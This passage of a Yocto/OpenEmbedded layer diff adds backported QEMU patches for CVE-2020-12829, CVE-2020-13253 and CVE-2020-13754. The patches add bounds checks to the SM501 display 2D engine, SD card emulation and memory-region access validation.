+-    /* get frame buffer info */
+-    uint8_t *src = s->local_mem + src_base;
+     uint8_t *dst = s->local_mem + dst_base;
+-    int src_pitch = s->twoD_pitch & 0x1FFF;
+     int dst_pitch = (s->twoD_pitch >> 16) & 0x1FFF;
+     int crt = (s->dc_crt_control & SM501_DC_CRT_CONTROL_SEL) ? 1 : 0;
+     int fb_len = get_width(s, crt) * get_height(s, crt) * get_bpp(s, crt);
+@@ -758,6 +749,13 @@ static void sm501_2d_operation(SM501State *s)
+ 
+     switch (cmd) {
+     case 0x00: /* copy area */
++    {
++        int src_x = (s->twoD_source >> 16) & 0x01FFF;
++        int src_y = s->twoD_source & 0xFFFF;
++        uint32_t src_base = s->twoD_source_base & 0x03FFFFFF;
++        uint8_t *src = s->local_mem + src_base;
++        int src_pitch = s->twoD_pitch & 0x1FFF;
++
+ #define COPY_AREA(_bpp, _pixel_type, rtl) {                                   \
+         int y, x, index_d, index_s;                                           \
+         for (y = 0; y < height; y++) {                              \
+@@ -793,8 +791,11 @@ static void sm501_2d_operation(SM501State *s)
+             break;
+         }
+         break;
+-
++    }
+     case 0x01: /* fill rectangle */
++    {
++        uint32_t color = s->twoD_foreground;
++
+ #define FILL_RECT(_bpp, _pixel_type) {                                      \
+         int y, x;                                                           \
+         for (y = 0; y < height; y++) {                            \
+@@ -819,7 +820,7 @@ static void sm501_2d_operation(SM501State *s)
+             break;
+         }
+         break;
+-
++    }
+     default:
+         qemu_log_mask(LOG_UNIMP, "sm501: not implemented 2D operation: %d\n",
+                       cmd);
+-- 
+2.25.1
+
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2020-12829_5.patch b/meta/recipes-devtools/qemu/qemu/CVE-2020-12829_5.patch
new file mode 100644
index 0000000000..ab09e8b039
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2020-12829_5.patch
@@ -0,0 +1,266 @@
+From b15a22bbcbe6a78dc3d88fe3134985e4cdd87de4 Mon Sep 17 00:00:00 2001
+From: BALATON Zoltan <balaton@eik.bme.hu>
+Date: Thu, 21 May 2020 21:39:44 +0200
+Subject: [PATCH 5/5] sm501: Replace hand written implementation with pixman
+ where possible
+
+Besides being faster this should also prevent malicious guests to
+abuse 2D engine to overwrite data or cause a crash.
+
+Signed-off-by: BALATON Zoltan <balaton@eik.bme.hu>
+Message-id: 58666389b6cae256e4e972a32c05cf8aa51bffc0.1590089984.git.balaton@eik.bme.hu
+Signed-off-by: Gerd Hoffmann <kraxel@redhat.com>
+
+Upstream-Status: Backport
+CVE: CVE-2020-12829 
+Signed-off-by: Armin Kuster <akuster@mvista.com>
+
+---
+ hw/display/sm501.c | 207 ++++++++++++++++++++++++++-------------------
+ 1 file changed, 119 insertions(+), 88 deletions(-)
+
+diff --git a/hw/display/sm501.c b/hw/display/sm501.c
+index 5ed57703d8..8bf4d111f4 100644
+--- a/hw/display/sm501.c
++++ b/hw/display/sm501.c
+@@ -706,13 +706,12 @@ static void sm501_2d_operation(SM501State *s)
+     /* 1 if rop2 source is the pattern, otherwise the source is the bitmap */
+     int rop2_source_is_pattern = (s->twoD_control >> 14) & 0x1;
+     int rop = s->twoD_control & 0xFF;
+-    int dst_x = (s->twoD_destination >> 16) & 0x01FFF;
+-    int dst_y = s->twoD_destination & 0xFFFF;
+-    int width = (s->twoD_dimension >> 16) & 0x1FFF;
+-    int height = s->twoD_dimension & 0xFFFF;
++    unsigned int dst_x = (s->twoD_destination >> 16) & 0x01FFF;
++    unsigned int dst_y = s->twoD_destination & 0xFFFF;
++    unsigned int width = (s->twoD_dimension >> 16) & 0x1FFF;
++    unsigned int height = s->twoD_dimension & 0xFFFF;
+     uint32_t dst_base = s->twoD_destination_base & 0x03FFFFFF;
+-    uint8_t *dst = s->local_mem + dst_base;
+-    int dst_pitch = (s->twoD_pitch >> 16) & 0x1FFF;
++    unsigned int dst_pitch = (s->twoD_pitch >> 16) & 0x1FFF;
+     int crt = (s->dc_crt_control & SM501_DC_CRT_CONTROL_SEL) ? 1 : 0;
+     int fb_len = get_width(s, crt) * get_height(s, crt) * get_bpp(s, crt);
+ 
+@@ -721,104 +720,136 @@ static void sm501_2d_operation(SM501State *s)
+         return;
+     }
+ 
+-    if (rop_mode == 0) {
+-        if (rop != 0xcc) {
+-            /* Anything other than plain copies are not supported */
+-            qemu_log_mask(LOG_UNIMP, "sm501: rop3 mode with rop %x is not "
+-                          "supported.\n", rop);
+-        }
+-    } else {
+-        if (rop2_source_is_pattern && rop != 0x5) {
+-            /* For pattern source, we support only inverse dest */
+-            qemu_log_mask(LOG_UNIMP, "sm501: rop2 source being the pattern and "
+-                          "rop %x is not supported.\n", rop);
+-        } else {
+-            if (rop != 0x5 && rop != 0xc) {
+-                /* Anything other than plain copies or inverse dest is not
+-                 * supported */
+-                qemu_log_mask(LOG_UNIMP, "sm501: rop mode %x is not "
+-                              "supported.\n", rop);
+-            }
+-        }
+-    }
+-
+     if (s->twoD_source_base & BIT(27) || s->twoD_destination_base & BIT(27)) {
+         qemu_log_mask(LOG_UNIMP, "sm501: only local memory is supported.\n");
+         return;
+     }
+ 
++    if (!dst_pitch) {
++        qemu_log_mask(LOG_GUEST_ERROR, "sm501: Zero dest pitch.\n");
++        return;
++    }
++
++    if (!width || !height) {
++        qemu_log_mask(LOG_GUEST_ERROR, "sm501: Zero size 2D op.\n");
++        return;
++    }
++
++    if (rtl) {
++        dst_x -= width - 1;
++        dst_y -= height - 1;
++    }
++
++    if (dst_base >= get_local_mem_size(s) || dst_base +
++        (dst_x + width + (dst_y + height) * (dst_pitch + width)) *
++        (1 << format) >= get_local_mem_size(s)) {
++        qemu_log_mask(LOG_GUEST_ERROR, "sm501: 2D op dest is outside vram.\n");
++        return;
++    }
++
+     switch (cmd) {
+-    case 0x00: /* copy area */
++    case 0: /* BitBlt */
+     {
+-        int src_x = (s->twoD_source >> 16) & 0x01FFF;
+-        int src_y = s->twoD_source & 0xFFFF;
++        unsigned int src_x = (s->twoD_source >> 16) & 0x01FFF;
++        unsigned int src_y = s->twoD_source & 0xFFFF;
+         uint32_t src_base = s->twoD_source_base & 0x03FFFFFF;
+-        uint8_t *src = s->local_mem + src_base;
+-        int src_pitch = s->twoD_pitch & 0x1FFF;
+-
+-#define COPY_AREA(_bpp, _pixel_type, rtl) {                                   \
+-        int y, x, index_d, index_s;                                           \
+-        for (y = 0; y < height; y++) {                              \
+-            for (x = 0; x < width; x++) {                           \
+-                _pixel_type val;                                              \
+-                                                                              \
+-                if (rtl) {                                                    \
+-                    index_s = ((src_y - y) * src_pitch + src_x - x) * _bpp;   \
+-                    index_d = ((dst_y - y) * dst_pitch + dst_x - x) * _bpp;   \
+-                } else {                                                      \
+-                    index_s = ((src_y + y) * src_pitch + src_x + x) * _bpp;   \
+-                    index_d = ((dst_y + y) * dst_pitch + dst_x + x) * _bpp;   \
+-                }                                                             \
+-                if (rop_mode == 1 && rop == 5) {                              \
+-                    /* Invert dest */                                         \
+-                    val = ~*(_pixel_type *)&dst[index_d];                     \
+-                } else {                                                      \
+-                    val = *(_pixel_type *)&src[index_s];                      \
+-                }                                                             \
+-                *(_pixel_type *)&dst[index_d] = val;                          \
+-            }                                                                 \
+-        }                                                                     \
+-    }
+-        switch (format) {
+-        case 0:
+-            COPY_AREA(1, uint8_t, rtl);
+-            break;
+-        case 1:
+-            COPY_AREA(2, uint16_t, rtl);
+-            break;
+-        case 2:
+-            COPY_AREA(4, uint32_t, rtl);
+-            break;
++        unsigned int src_pitch = s->twoD_pitch & 0x1FFF;
++
++        if (!src_pitch) {
++            qemu_log_mask(LOG_GUEST_ERROR, "sm501: Zero src pitch.\n");
++            return;
++        }
++
++        if (rtl) {
++            src_x -= width - 1;
++            src_y -= height - 1;
++        }
++
++        if (src_base >= get_local_mem_size(s) || src_base +
++            (src_x + width + (src_y + height) * (src_pitch + width)) *
++            (1 << format) >= get_local_mem_size(s)) {
++            qemu_log_mask(LOG_GUEST_ERROR,
++                          "sm501: 2D op src is outside vram.\n");
++            return;
++        }
++
++        if ((rop_mode && rop == 0x5) || (!rop_mode && rop == 0x55)) {
++            /* Invert dest, is there a way to do this with pixman? */
++            unsigned int x, y, i;
++            uint8_t *d = s->local_mem + dst_base;
++
++            for (y = 0; y < height; y++) {
++                i = (dst_x + (dst_y + y) * dst_pitch) * (1 << format);
++                for (x = 0; x < width; x++, i += (1 << format)) {
++                    switch (format) {
++                    case 0:
++                        d[i] = ~d[i];
++                        break;
++                    case 1:
++                        *(uint16_t *)&d[i] = ~*(uint16_t *)&d[i];
++                        break;
++                    case 2:
++                        *(uint32_t *)&d[i] = ~*(uint32_t *)&d[i];
++                        break;
++                    }
++                }
++            }
++        } else {
++            /* Do copy src for unimplemented ops, better than unpainted area */
++            if ((rop_mode && (rop != 0xc || rop2_source_is_pattern)) ||
++                (!rop_mode && rop != 0xcc)) {
++                qemu_log_mask(LOG_UNIMP,
++                              "sm501: rop%d op %x%s not implemented\n",
++                              (rop_mode ? 2 : 3), rop,
++                              (rop2_source_is_pattern ?
++                                  " with pattern source" : ""));
++            }
++            /* Check for overlaps, this could be made more exact */
++            uint32_t sb, se, db, de;
++            sb = src_base + src_x + src_y * (width + src_pitch);
++            se = sb + width + height * (width + src_pitch);
++            db = dst_base + dst_x + dst_y * (width + dst_pitch);
++            de = db + width + height * (width + dst_pitch);
++            if (rtl && ((db >= sb && db <= se) || (de >= sb && de <= se))) {
++                /* regions may overlap: copy via temporary */
++                int llb = width * (1 << format);
++                int tmp_stride = DIV_ROUND_UP(llb, sizeof(uint32_t));
++                uint32_t *tmp = g_malloc(tmp_stride * sizeof(uint32_t) *
++                                         height);
++                pixman_blt((uint32_t *)&s->local_mem[src_base], tmp,
++                           src_pitch * (1 << format) / sizeof(uint32_t),
++                           tmp_stride, 8 * (1 << format), 8 * (1 << format),
++                           src_x, src_y, 0, 0, width, height);
++                pixman_blt(tmp, (uint32_t *)&s->local_mem[dst_base],
++                           tmp_stride,
++                           dst_pitch * (1 << format) / sizeof(uint32_t),
++                           8 * (1 << format), 8 * (1 << format),
++                           0, 0, dst_x, dst_y, width, height);
++                g_free(tmp);
++            } else {
++                pixman_blt((uint32_t *)&s->local_mem[src_base],
++                           (uint32_t *)&s->local_mem[dst_base],
++                           src_pitch * (1 << format) / sizeof(uint32_t),
++                           dst_pitch * (1 << format) / sizeof(uint32_t),
++                           8 * (1 << format), 8 * (1 << format),
++                           src_x, src_y, dst_x, dst_y, width, height);
++            }
+         }
+         break;
+     }
+-    case 0x01: /* fill rectangle */
++    case 1: /* Rectangle Fill */
+     {
+         uint32_t color = s->twoD_foreground;
+ 
+-#define FILL_RECT(_bpp, _pixel_type) {                                      \
+-        int y, x;                                                           \
+-        for (y = 0; y < height; y++) {                            \
+-            for (x = 0; x < width; x++) {                         \
+-                int index = ((dst_y + y) * dst_pitch + dst_x + x) * _bpp;   \
+-                *(_pixel_type *)&dst[index] = (_pixel_type)color;           \
+-            }                                                               \
+-        }                                                                   \
+-    }
+-
+-        switch (format) {
+-        case 0:
+-            FILL_RECT(1, uint8_t);
+-            break;
+-        case 1:
+-            color = cpu_to_le16(color);
+-            FILL_RECT(2, uint16_t);
+-            break;
+-        case 2:
++        if (format == 2) {
+             color = cpu_to_le32(color);
+-            FILL_RECT(4, uint32_t);
+-            break;
++        } else if (format == 1) {
++            color = cpu_to_le16(color);
+         }
++
++        pixman_fill((uint32_t *)&s->local_mem[dst_base],
++                    dst_pitch * (1 << format) / sizeof(uint32_t),
++                    8 * (1 << format), dst_x, dst_y, width, height, color);
+         break;
+     }
+     default:
+-- 
+2.25.1
+
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2020-13253_1.patch b/meta/recipes-devtools/qemu/qemu/CVE-2020-13253_1.patch
new file mode 100644
index 0000000000..7f8383987c
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2020-13253_1.patch
@@ -0,0 +1,50 @@
+From 6dd3a164f5b31c703c7d8372841ad3bd6a57de6d Mon Sep 17 00:00:00 2001
+From: =?utf8?q?Philippe=20Mathieu-Daud=C3=A9?= <f4bug@amsat.org>
+Date: Tue, 5 Jun 2018 22:28:51 -0300
+Subject: [PATCH 1/1] hw/sd/sdcard: Simplify realize() a bit
+MIME-Version: 1.0
+Content-Type: text/plain; charset=utf8
+Content-Transfer-Encoding: 8bit
+
+We don't need to check if sd->blk is set twice.
+
+Reviewed-by: Peter Maydell <peter.maydell@linaro.org>
+Signed-off-by: Philippe Mathieu-Daudé <f4bug@amsat.org>
+Reviewed-by: Alistair Francis <alistair.francis@wdc.com>
+Message-Id: <20200630133912.9428-18-f4bug@amsat.org>
+
+Upstram-Status: Backport:
+https://git.qemu.org/?p=qemu.git;a=commit;f=hw/sd/sd.c;h=6dd3a164f5b31c703c7d8372841ad3bd6a57de6d
+
+CVE: CVE-2020-13253
+
+Signed-off-by: Davide Gardenal <davide.gardenal@huawei.com>
+---
+ hw/sd/sd.c | 10 +++++-----
+ 1 file changed, 5 insertions(+), 5 deletions(-)
+
+diff --git a/hw/sd/sd.c b/hw/sd/sd.c
+index 1cc16bf..edd60a0 100644
+--- a/hw/sd/sd.c
++++ b/hw/sd/sd.c
+@@ -2105,12 +2105,12 @@ static void sd_realize(DeviceState *dev, Error **errp)
+         return;
+     }
+ 
+-    if (sd->blk && blk_is_read_only(sd->blk)) {
+-        error_setg(errp, "Cannot use read-only drive as SD card");
+-        return;
+-    }
+-
+     if (sd->blk) {
++        if (blk_is_read_only(sd->blk)) {
++            error_setg(errp, "Cannot use read-only drive as SD card");
++            return;
++        }
++
+         ret = blk_set_perm(sd->blk, BLK_PERM_CONSISTENT_READ | BLK_PERM_WRITE,
+                            BLK_PERM_ALL, errp);
+         if (ret < 0) {
+-- 
+1.8.3.1
+
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2020-13253_2.patch b/meta/recipes-devtools/qemu/qemu/CVE-2020-13253_2.patch
new file mode 100644
index 0000000000..53145d059f
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2020-13253_2.patch
@@ -0,0 +1,112 @@
+From a9bcedd15a5834ca9ae6c3a97933e85ac7edbd36 Mon Sep 17 00:00:00 2001
+From: =?UTF-8?q?Philippe=20Mathieu-Daud=C3=A9?= <f4bug@amsat.org>
+Date: Tue, 7 Jul 2020 13:02:34 +0200
+Subject: [PATCH] hw/sd/sdcard: Do not allow invalid SD card sizes
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+QEMU allows to create SD card with unrealistic sizes. This could
+work, but some guests (at least Linux) consider sizes that are not
+a power of 2 as a firmware bug and fix the card size to the next
+power of 2.
+
+While the possibility to use small SD card images has been seen as
+a feature, it became a bug with CVE-2020-13253, where the guest is
+able to do OOB read/write accesses past the image size end.
+
+In a pair of commits we will fix CVE-2020-13253 as:
+
+    Read command is rejected if BLOCK_LEN_ERROR or ADDRESS_ERROR
+    occurred and no data transfer is performed.
+
+    Write command is rejected if BLOCK_LEN_ERROR or ADDRESS_ERROR
+    occurred and no data transfer is performed.
+
+    WP_VIOLATION errors are not modified: the error bit is set, we
+    stay in receive-data state, wait for a stop command. All further
+    data transfer is ignored. See the check on sd->card_status at the
+    beginning of sd_read_data() and sd_write_data().
+
+While this is the correct behavior, in case QEMU create smaller SD
+cards, guests still try to access past the image size end, and QEMU
+considers this is an invalid address, thus "all further data transfer
+is ignored". This is wrong and make the guest looping until
+eventually timeouts.
+
+Fix by not allowing invalid SD card sizes (suggesting the expected
+size as a hint):
+
+  $ qemu-system-arm -M orangepi-pc -drive file=rootfs.ext2,if=sd,format=raw
+  qemu-system-arm: Invalid SD card size: 60 MiB
+  SD card size has to be a power of 2, e.g. 64 MiB.
+  You can resize disk images with 'qemu-img resize <imagefile> <new-size>'
+  (note that this will lose data if you make the image smaller than it currently is).
+
+Cc: qemu-stable@nongnu.org
+Signed-off-by: Philippe Mathieu-Daudé <f4bug@amsat.org>
+Reviewed-by: Alistair Francis <alistair.francis@wdc.com>
+Reviewed-by: Peter Maydell <peter.maydell@linaro.org>
+Message-Id: <20200713183209.26308-8-f4bug@amsat.org>
+
+Upstram-Status: Backport:
+https://git.qemu.org/?p=qemu.git;a=commit;h=a9bcedd15a5834ca9ae6c3a97933e85ac7edbd36
+
+CVE: CVE-2020-13253
+
+Signed-off-by: Davide Gardenal <davide.gardenal@huawei.com>
+---
+ hw/sd/sd.c | 25 +++++++++++++++++++++++++
+ 1 file changed, 25 insertions(+)
+
+diff --git a/hw/sd/sd.c b/hw/sd/sd.c
+index edd60a09c0..76d68359a4 100644
+--- a/hw/sd/sd.c
++++ b/hw/sd/sd.c
+@@ -32,6 +32,7 @@
+ 
+ #include "qemu/osdep.h"
+ #include "qemu/units.h"
++#include "qemu/cutils.h"
+ #include "hw/irq.h"
+ #include "hw/registerfields.h"
+ #include "sysemu/block-backend.h"
+@@ -2106,11 +2107,35 @@ static void sd_realize(DeviceState *dev, Error **errp)
+     }
+ 
+     if (sd->blk) {
++        int64_t blk_size;
++
+         if (blk_is_read_only(sd->blk)) {
+             error_setg(errp, "Cannot use read-only drive as SD card");
+             return;
+         }
+ 
++        blk_size = blk_getlength(sd->blk);
++        if (blk_size > 0 && !is_power_of_2(blk_size)) {
++            int64_t blk_size_aligned = pow2ceil(blk_size);
++            char *blk_size_str;
++
++            blk_size_str = size_to_str(blk_size);
++            error_setg(errp, "Invalid SD card size: %s", blk_size_str);
++            g_free(blk_size_str);
++
++            blk_size_str = size_to_str(blk_size_aligned);
++            error_append_hint(errp,
++                              "SD card size has to be a power of 2, e.g. %s.\n"
++                              "You can resize disk images with"
++                              " 'qemu-img resize <imagefile> <new-size>'\n"
++                              "(note that this will lose data if you make the"
++                              " image smaller than it currently is).\n",
++                              blk_size_str);
++            g_free(blk_size_str);
++
++            return;
++        }
++
+         ret = blk_set_perm(sd->blk, BLK_PERM_CONSISTENT_READ | BLK_PERM_WRITE,
+                            BLK_PERM_ALL, errp);
+         if (ret < 0) {
+-- 
+2.32.0
+
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2020-13253_3.patch b/meta/recipes-devtools/qemu/qemu/CVE-2020-13253_3.patch
new file mode 100644
index 0000000000..b512b2bd7f
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2020-13253_3.patch
@@ -0,0 +1,86 @@
+From 794d68de2f021a6d3874df41d6bbe8590ec05207 Mon Sep 17 00:00:00 2001
+From: =?utf8?q?Philippe=20Mathieu-Daud=C3=A9?= <f4bug@amsat.org>
+Date: Mon, 13 Jul 2020 09:27:35 +0200
+Subject: [PATCH] hw/sd/sdcard: Update coding style to make checkpatch.pl happy
+MIME-Version: 1.0
+Content-Type: text/plain; charset=utf8
+Content-Transfer-Encoding: 8bit
+
+To make the next commit easier to review, clean this code first.
+
+Reviewed-by: Peter Maydell <peter.maydell@linaro.org>
+Signed-off-by: Philippe Mathieu-Daudé <f4bug@amsat.org>
+Reviewed-by: Alistair Francis <alistair.francis@wdc.com>
+Reviewed-by: Alexander Bulekov <alxndr@bu.edu>
+Message-Id: <20200630133912.9428-3-f4bug@amsat.org>
+
+Upstram-Status: Backport:
+https://git.qemu.org/?p=qemu.git;a=commit;f=hw/sd/sd.c;h=794d68de2f021a6d3874df41d6bbe8590ec05207
+
+CVE: CVE-2020-13253
+
+Signed-off-by: Davide Gardenal <davide.gardenal@huawei.com>
+---
+diff --git a/hw/sd/sd.c b/hw/sd/sd.c
+--- a/hw/sd/sd.c	(revision b0ca999a43a22b38158a222233d3f5881648bb4f)
++++ b/hw/sd/sd.c	(date 1647514442924)
+@@ -1154,8 +1154,9 @@
+             sd->data_start = addr;
+             sd->data_offset = 0;
+ 
+-            if (sd->data_start + sd->blk_len > sd->size)
++            if (sd->data_start + sd->blk_len > sd->size) {
+                 sd->card_status |= ADDRESS_ERROR;
++            }
+             return sd_r1;
+ 
+         default:
+@@ -1170,8 +1171,9 @@
+             sd->data_start = addr;
+             sd->data_offset = 0;
+ 
+-            if (sd->data_start + sd->blk_len > sd->size)
++            if (sd->data_start + sd->blk_len > sd->size) {
+                 sd->card_status |= ADDRESS_ERROR;
++            }
+             return sd_r1;
+ 
+         default:
+@@ -1216,12 +1218,15 @@
+             sd->data_offset = 0;
+             sd->blk_written = 0;
+ 
+-            if (sd->data_start + sd->blk_len > sd->size)
++            if (sd->data_start + sd->blk_len > sd->size) {
+                 sd->card_status |= ADDRESS_ERROR;
+-            if (sd_wp_addr(sd, sd->data_start))
++            }
++            if (sd_wp_addr(sd, sd->data_start)) {
+                 sd->card_status |= WP_VIOLATION;
+-            if (sd->csd[14] & 0x30)
++            }
++            if (sd->csd[14] & 0x30) {
+                 sd->card_status |= WP_VIOLATION;
++            }
+             return sd_r1;
+ 
+         default:
+@@ -1240,12 +1245,15 @@
+             sd->data_offset = 0;
+             sd->blk_written = 0;
+ 
+-            if (sd->data_start + sd->blk_len > sd->size)
++            if (sd->data_start + sd->blk_len > sd->size) {
+                 sd->card_status |= ADDRESS_ERROR;
+-            if (sd_wp_addr(sd, sd->data_start))
++            }
++            if (sd_wp_addr(sd, sd->data_start)) {
+                 sd->card_status |= WP_VIOLATION;
+-            if (sd->csd[14] & 0x30)
++            }
++            if (sd->csd[14] & 0x30) {
+                 sd->card_status |= WP_VIOLATION;
++            }
+             return sd_r1;
+ 
+         default:
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2020-13253_4.patch b/meta/recipes-devtools/qemu/qemu/CVE-2020-13253_4.patch
new file mode 100644
index 0000000000..6b4c1ec050
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2020-13253_4.patch
@@ -0,0 +1,139 @@
+From 790762e5487114341cccc5bffcec4cb3c022c3cd Mon Sep 17 00:00:00 2001
+From: =?UTF-8?q?Philippe=20Mathieu-Daud=C3=A9?= <f4bug@amsat.org>
+Date: Thu, 4 Jun 2020 19:22:29 +0200
+Subject: [PATCH] hw/sd/sdcard: Do not switch to ReceivingData if address is
+ invalid
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+Only move the state machine to ReceivingData if there is no
+pending error. This avoids later OOB access while processing
+commands queued.
+
+  "SD Specifications Part 1 Physical Layer Simplified Spec. v3.01"
+
+  4.3.3 Data Read
+
+  Read command is rejected if BLOCK_LEN_ERROR or ADDRESS_ERROR
+  occurred and no data transfer is performed.
+
+  4.3.4 Data Write
+
+  Write command is rejected if BLOCK_LEN_ERROR or ADDRESS_ERROR
+  occurred and no data transfer is performed.
+
+WP_VIOLATION errors are not modified: the error bit is set, we
+stay in receive-data state, wait for a stop command. All further
+data transfer is ignored. See the check on sd->card_status at the
+beginning of sd_read_data() and sd_write_data().
+
+Fixes: CVE-2020-13253
+
+Cc: qemu-stable@nongnu.org
+Reported-by: Alexander Bulekov <alxndr@bu.edu>
+Buglink: https://bugs.launchpad.net/qemu/+bug/1880822
+Reviewed-by: Peter Maydell <peter.maydell@linaro.org>
+Signed-off-by: Philippe Mathieu-Daudé <f4bug@amsat.org>
+Reviewed-by: Alistair Francis <alistair.francis@wdc.com>
+Message-Id: <20200630133912.9428-6-f4bug@amsat.org>
+
+Upstram-Status: Backport:
+https://git.qemu.org/?p=qemu.git;a=commit;h=790762e5487114341cccc5bffcec4cb3c022c3cd
+
+CVE: CVE-2020-13253
+
+Signed-off-by: Davide Gardenal <davide.gardenal@huawei.com>
+---
+ hw/sd/sd.c | 38 ++++++++++++++++++++++++--------------
+ 1 file changed, 24 insertions(+), 14 deletions(-)
+
+diff --git a/hw/sd/sd.c b/hw/sd/sd.c
+index f4f76f8fd2..fad9cf1ee7 100644
+--- a/hw/sd/sd.c
++++ b/hw/sd/sd.c
+@@ -1171,13 +1171,15 @@ static sd_rsp_type_t sd_normal_command(SDState *sd, SDRequest req)
+     case 17:	/* CMD17:  READ_SINGLE_BLOCK */
+         switch (sd->state) {
+         case sd_transfer_state:
+-            sd->state = sd_sendingdata_state;
+-            sd->data_start = addr;
+-            sd->data_offset = 0;
+ 
+-            if (sd->data_start + sd->blk_len > sd->size) {
++            if (addr + sd->blk_len > sd->size) {
+                 sd->card_status |= ADDRESS_ERROR;
++                return sd_r1;
+             }
++
++            sd->state = sd_sendingdata_state;
++            sd->data_start = addr;
++            sd->data_offset = 0;
+             return sd_r1;
+ 
+         default:
+@@ -1188,13 +1190,15 @@ static sd_rsp_type_t sd_normal_command(SDState *sd, SDRequest req)
+     case 18:	/* CMD18:  READ_MULTIPLE_BLOCK */
+         switch (sd->state) {
+         case sd_transfer_state:
+-            sd->state = sd_sendingdata_state;
+-            sd->data_start = addr;
+-            sd->data_offset = 0;
+ 
+-            if (sd->data_start + sd->blk_len > sd->size) {
++            if (addr + sd->blk_len > sd->size) {
+                 sd->card_status |= ADDRESS_ERROR;
++                return sd_r1;
+             }
++
++            sd->state = sd_sendingdata_state;
++            sd->data_start = addr;
++            sd->data_offset = 0;
+             return sd_r1;
+ 
+         default:
+@@ -1234,14 +1238,17 @@ static sd_rsp_type_t sd_normal_command(SDState *sd, SDRequest req)
+             /* Writing in SPI mode not implemented.  */
+             if (sd->spi)
+                 break;
++
++            if (addr + sd->blk_len > sd->size) {
++                sd->card_status |= ADDRESS_ERROR;
++                return sd_r1;
++            }
++
+             sd->state = sd_receivingdata_state;
+             sd->data_start = addr;
+             sd->data_offset = 0;
+             sd->blk_written = 0;
+ 
+-            if (sd->data_start + sd->blk_len > sd->size) {
+-                sd->card_status |= ADDRESS_ERROR;
+-            }
+             if (sd_wp_addr(sd, sd->data_start)) {
+                 sd->card_status |= WP_VIOLATION;
+             }
+@@ -1261,14 +1268,17 @@ static sd_rsp_type_t sd_normal_command(SDState *sd, SDRequest req)
+             /* Writing in SPI mode not implemented.  */
+             if (sd->spi)
+                 break;
++
++            if (addr + sd->blk_len > sd->size) {
++                sd->card_status |= ADDRESS_ERROR;
++                return sd_r1;
++            }
++
+             sd->state = sd_receivingdata_state;
+             sd->data_start = addr;
+             sd->data_offset = 0;
+             sd->blk_written = 0;
+ 
+-            if (sd->data_start + sd->blk_len > sd->size) {
+-                sd->card_status |= ADDRESS_ERROR;
+-            }
+             if (sd_wp_addr(sd, sd->data_start)) {
+                 sd->card_status |= WP_VIOLATION;
+             }
+-- 
+2.32.0
+
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2020-13253_5.patch b/meta/recipes-devtools/qemu/qemu/CVE-2020-13253_5.patch
new file mode 100644
index 0000000000..ffce610f79
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2020-13253_5.patch
@@ -0,0 +1,54 @@
+From 9157dd597d293ab7f599f4d96c3fe8a6e07c633d Mon Sep 17 00:00:00 2001
+From: =?utf8?q?Philippe=20Mathieu-Daud=C3=A9?= <f4bug@amsat.org>
+Date: Wed, 3 Jun 2020 19:59:16 +0200
+Subject: [PATCH] hw/sd/sdcard: Restrict Class 6 commands to SCSD cards
+MIME-Version: 1.0
+Content-Type: text/plain; charset=utf8
+Content-Transfer-Encoding: 8bit
+
+Only SCSD cards support Class 6 (Block Oriented Write Protection)
+commands.
+
+  "SD Specifications Part 1 Physical Layer Simplified Spec. v3.01"
+
+  4.3.14 Command Functional Difference in Card Capacity Types
+
+  * Write Protected Group
+
+  SDHC and SDXC do not support write-protected groups. Issuing
+  CMD28, CMD29 and CMD30 generates the ILLEGAL_COMMAND error.
+
+Cc: qemu-stable@nongnu.org
+Reviewed-by: Peter Maydell <peter.maydell@linaro.org>
+Signed-off-by: Philippe Mathieu-Daudé <f4bug@amsat.org>
+Reviewed-by: Alistair Francis <alistair.francis@wdc.com>
+Message-Id: <20200630133912.9428-7-f4bug@amsat.org>
+
+Upstram-Status: Backport:
+https://git.qemu.org/?p=qemu.git;a=commit;h=9157dd597d293ab7f599f4d96c3fe8a6e07c633d
+
+CVE: CVE-2020-13253
+
+Signed-off-by: Davide Gardenal <davide.gardenal@huawei.com>
+---
+ hw/sd/sd.c | 5 +++++
+ 1 file changed, 5 insertions(+)
+
+diff --git a/hw/sd/sd.c b/hw/sd/sd.c
+index 5137168..1cc16bf 100644
+--- a/hw/sd/sd.c
++++ b/hw/sd/sd.c
+@@ -920,6 +920,11 @@ static sd_rsp_type_t sd_normal_command(SDState *sd, SDRequest req)
+         sd->multi_blk_cnt = 0;
+     }
+ 
++    if (sd_cmd_class[req.cmd] == 6 && FIELD_EX32(sd->ocr, OCR, CARD_CAPACITY)) {
++        /* Only Standard Capacity cards support class 6 commands */
++        return sd_illegal;
++    }
++
+     switch (req.cmd) {
+     /* Basic commands (Class 0 and Class 1) */
+     case 0:	/* CMD0:   GO_IDLE_STATE */
+-- 
+1.8.3.1 
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2020-13754-1.patch b/meta/recipes-devtools/qemu/qemu/CVE-2020-13754-1.patch
new file mode 100644
index 0000000000..fdfff9d81d
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2020-13754-1.patch
@@ -0,0 +1,91 @@
+From 5d971f9e672507210e77d020d89e0e89165c8fc9 Mon Sep 17 00:00:00 2001
+From: "Michael S. Tsirkin" <mst@redhat.com>
+Date: Wed, 10 Jun 2020 09:47:49 -0400
+Subject: [PATCH] memory: Revert "memory: accept mismatching sizes in
+ memory_region_access_valid"
+
+Memory API documentation documents valid .min_access_size and .max_access_size
+fields and explains that any access outside these boundaries is blocked.
+
+This is what devices seem to assume.
+
+However this is not what the implementation does: it simply
+ignores the boundaries unless there's an "accepts" callback.
+
+Naturally, this breaks a bunch of devices.
+
+Revert to the documented behaviour.
+
+Devices that want to allow any access can just drop the valid field,
+or add the impl field to have accesses converted to appropriate
